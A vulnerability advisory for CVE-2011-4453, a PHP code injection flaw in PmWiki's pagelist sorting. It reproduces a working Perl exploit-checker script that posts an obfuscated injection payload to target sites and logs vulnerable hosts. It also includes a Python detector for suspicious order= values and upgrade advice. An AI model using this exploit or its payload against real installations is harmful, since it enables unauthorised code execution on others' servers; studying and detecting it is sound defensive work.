PmWiki 'PageListSort()' Function PHP Code Injection Vulnerability

Published: 2011-11-23
Updated: 2011-12-23

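Affected systems:
PmWiki PmWiki 2.x
Unaffected systems:
PmWiki PmWiki 2.2.35
Description:
BUGTRAQ  ID: 50776
CVE ID: CVE-2011-4453

PmWiki is an open-source, wiki-based tool for collaboratively creating and maintaining websites.

PmWiki's implementation contains a PHP code injection vulnerability that an attacker can exploit to inject and execute arbitrary PHP code.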

<*Source: Egidio Romano aka EgiX
  *>

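Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Egidio Romano aka EgiX provided the following test method: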


$ cat test.pl
#!/usr/bin/perl -w
#
# *** Author: ZmEu
# *** Thanks: haxnet, foonet and blackhat(s).
# *** Tested on: Mac (darwin 8.11.0).
#
# "You may stop me, but you can't stop us all.".
#

use LWP::UserAgent;

my $adresa=$ARGV[0] or die("(@)Se foloseste: perl pmwiki.pl http://example.com/pmwiki/pmwiki.php\n");
my $incarca="chr%2890%29.chr%28109%29.chr%2869%29.chr%28117%29.chr%2832%29.chr%2848%29.chr%2846%29.chr%2849%29.chr%2832%29.chr%2845%29.chr%2832%29.chr%28112%29.chr%28109%29.chr%28119%29.chr%28105%29.chr%28107%29.chr%28105%29";

$ua=new LWP::UserAgent;
$ua->agent("ZmEu/1.0");

my $pmwikireq=new HTTP::Request POST => $adresa;
$pmwikireq->content_type("application/x-www-form-urlencoded");
$pmwikireq->content("action=edit&n=Cmd.foo&text=%28%3Apagelist+order%3D%27%5D%29%3Berror_reporting%280%29%3Bprint%28$incarca%29%3Bdie%3B%23%3A%29&csum=&author=foo&preview=+Preview+");

my $pmwikires=$ua->request($pmwikireq);
my $zmeu=$pmwikires->as_string;

if($zmeu=~/ZmEu 0.1 - pmwiki/)
{
        print "(@)OK:$adresa\n";
        open(PMWIKIVULN, ">>vuln.txt");
        print PMWIKIVULN ("$adresa\n");
        close PMWIKIVULN;
}
else
{
       print "BAD:$adresa\n"; # a password is required.
}
$

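Recommendation:
Vendor patch:

PmWiki
------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:

http://www.pmwiki.org/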
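
For reviewing logged edit requests or stored page text on installations that have not yet been upgraded, the following check is an added example (not code from this advisory or from PmWiki). It flags `(:pagelist ... order=... :)` directives whose order value contains characters outside a conservative allow-list, which is the shape of the test request above; the allow-list and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Assumption: legitimate order= values are comma-separated sort keys built from
# letters, digits and a few punctuation marks (e.g. "-time", "$:Year,title").
SAFE_ORDER = re.compile(r"^[A-Za-z0-9_$:{}.,+\-]*$")

# A (:pagelist ... :) directive; the captured body runs up to the closing ":)".
DIRECTIVE = re.compile(r"\(:pagelist\b(.*?):\)", re.IGNORECASE | re.DOTALL)
# The order= argument: double-quoted, single-quoted or bare value.
ORDER_ARG = re.compile(r"""\border=(?:"([^"]*)"|'([^']*)'|(\S*))""", re.IGNORECASE)


def suspicious_orders(text):
    """Return the order= values in wiki markup that fall outside SAFE_ORDER."""
    hits = []
    for directive in DIRECTIVE.finditer(text):
        for m in ORDER_ARG.finditer(directive.group(1)):
            # Exactly one of the three alternatives captured the value.
            value = next(g for g in m.groups() if g is not None)
            if not SAFE_ORDER.match(value):
                hits.append(value)
    return hits


def scan_post_body(body):
    """Decode a form-encoded edit request and check its text= field."""
    fields = parse_qs(body, keep_blank_values=True)
    hits = []
    for text in fields.get("text", []):
        hits.extend(suspicious_orders(text))
    return hits


# Constructed samples. SAMPLE_BAD reuses only the order= prefix and suffix
# that appear in the test request on this page; SAMPLE_OK is ordinary markup.
SAMPLE_BAD = ("action=edit&n=Cmd.foo&text=%28%3Apagelist+order%3D%27%5D%29"
              "%3Bdie%3B%23%3A%29&author=foo")
SAMPLE_OK = ("action=edit&n=Main.Index&text=%28%3Apagelist+group%3DMain"
             "+order%3D-time%3A%29")

if __name__ == "__main__":
    for body in (SAMPLE_BAD, SAMPLE_OK):
        print(scan_post_body(body))
```

A hit only indicates an attempt or a stored page worth inspecting; upgrading to 2.2.35, listed above as unaffected, is the fix.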

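This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.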